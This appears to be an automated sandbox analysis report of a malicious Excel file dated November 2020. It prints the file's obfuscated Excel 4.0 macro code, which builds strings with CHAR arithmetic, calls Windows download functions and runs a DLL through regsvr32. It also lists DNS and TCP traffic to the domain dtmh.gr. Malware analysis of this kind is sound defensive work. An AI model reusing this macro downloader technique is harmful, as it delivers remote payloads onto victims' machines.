                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . x 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 327615
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:327615
                                                                                                                                                                                              Entropy:7.64857931295
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                                                              CALL("Ke"&????2!HY314&"32", "Cr"&????2!IA342&"yA", "JCJ", ????2!HP312&????2!HP327, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              CALL("U"&????2!IA332, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HP312&????2!HP327&????2!HP341, 0, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312&????2!HP327,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                              "=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                                                                                                                                                                              "=CALL(""U""&????2!IA332,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HP312&????2!HP327&????2!HP341,0,0)"=EXEC(????3!W36&????2!HP312&????2!HP327&????2!HP341)=HALT()

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 04:05:19.278496981 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:19.299901009 CET4434973278.46.235.88192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:19.300091982 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:19.302673101 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:19.692765951 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:20.177274942 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:20.786696911 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:21.989716053 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:23.192878962 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:24.396131039 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:26.849479914 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:31.662331104 CET49732443192.168.2.478.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:05:41.272517920 CET49732443192.168.2.478.46.235.88

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 04:05:13.880429029 CET6454953192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:13.916152000 CET53645498.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:14.158256054 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:14.193897009 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:15.162035942 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:15.197355986 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:16.218050957 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:16.253396034 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:18.223984957 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:18.259732008 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:19.240200043 CET5299153192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:19.275825977 CET53529918.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:22.239895105 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:22.277738094 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:26.400037050 CET5370053192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:26.427191019 CET53537008.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:29.132659912 CET5172653192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:29.159759045 CET53517268.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:41.889662027 CET5679453192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:41.927577972 CET53567948.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:42.469772100 CET5653453192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:42.505255938 CET53565348.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:43.044841051 CET5662753192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:43.080167055 CET53566278.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:43.356899977 CET5662153192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:43.394382954 CET53566218.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:43.733107090 CET6311653192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:43.760324001 CET53631168.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:44.087939024 CET6407853192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:44.133696079 CET53640788.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:44.135993004 CET6480153192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:44.163069963 CET53648018.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:44.574951887 CET6172153192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:44.610229015 CET53617218.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:45.209136009 CET5125553192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:45.236332893 CET53512558.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:45.839934111 CET6152253192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:45.867113113 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:46.211276054 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:46.246915102 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:49.990365028 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:50.017354965 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:50.302328110 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:50.337749004 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:51.113321066 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:51.151030064 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:51.976322889 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:52.011673927 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:52.785813093 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:52.813024998 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:53.901968002 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:53.929059982 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:54.678476095 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:54.713866949 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:55.485718966 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:55.521107912 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:57.999578953 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:58.026925087 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:05:59.091089010 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:05:59.118254900 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:02.785300016 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:02.822737932 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:20.310333967 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:20.345813990 CET53492288.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:21.184407949 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:21.220011950 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:22.003146887 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:22.040801048 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:23.125701904 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:23.161107063 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:23.919944048 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:23.955271006 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:24.715276003 CET6068953192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:24.742463112 CET53606898.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:36.344120026 CET6420653192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:36.371124983 CET53642068.8.8.8192.168.2.4
                                                                                                                                                                                              Nov 29, 2020 04:06:37.863200903 CET5090453192.168.2.48.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:06:37.898777008 CET53509048.8.8.8192.168.2.4

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Nov 29, 2020 04:05:19.240200043 CET192.168.2.48.8.8.80xf369Standard query (0)dtmh.grA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Nov 29, 2020 04:05:19.275825977 CET8.8.8.8192.168.2.40xf369No error (0)dtmh.gr78.46.235.88A (IP address)IN (0x0001)

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:04:05:11
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0x9d0000
                                                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:04:05:40
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                                                                                                                                                                              Imagebase:0x1350000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >